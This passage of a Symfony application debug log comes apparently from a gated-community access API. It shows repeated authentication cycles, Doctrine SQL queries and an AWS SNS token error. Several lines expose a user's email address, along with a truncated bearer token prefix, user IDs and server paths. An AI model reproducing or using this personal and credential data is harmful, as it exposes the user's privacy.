xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>5d68f987-8cf7-5e77-a2c5-9846d09726d3</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-21 02:23:28] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ea8ebf85-64c0-4608-897f-51db3c3b7f50/invitation/10/0?order=desc","method":"GET"} []
[2025-12-21 02:23:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:23:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [487,263,1] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 02:23:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [263,1] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [263,1] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [485] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [387] []
[2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25549] []
[2025-12-21 02:23:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:23:29] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 02:23:29] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:29] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 02:23:29] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 02:23:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:23:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:29] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:29] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:29] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:29] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:29] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["3cca5f86-17af-4c0b-b794-bd [...]"] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [487,1] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [487,1] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [487,263] []
[2025-12-21 02:23:29] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:23:31] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ea8ebf85-64c0-4608-897f-51db3c3b7f50/invitation/10/0?order=desc","method":"GET"} []
[2025-12-21 02:23:31] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:31] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 02:23:31] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 02:23:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:23:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:31] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:31] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:31] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:31] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:31] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [487,263,1] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [263,1] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [263,1] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [485] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [387] []
[2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25549] []
[2025-12-21 02:23:31] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:23:33] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ea8ebf85-64c0-4608-897f-51db3c3b7f50/invitation/10/0?order=desc","method":"GET"} []
[2025-12-21 02:23:33] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:33] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 02:23:33] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 02:23:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:23:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:33] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:33] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:33] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:33] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:33] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [487,263,1] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
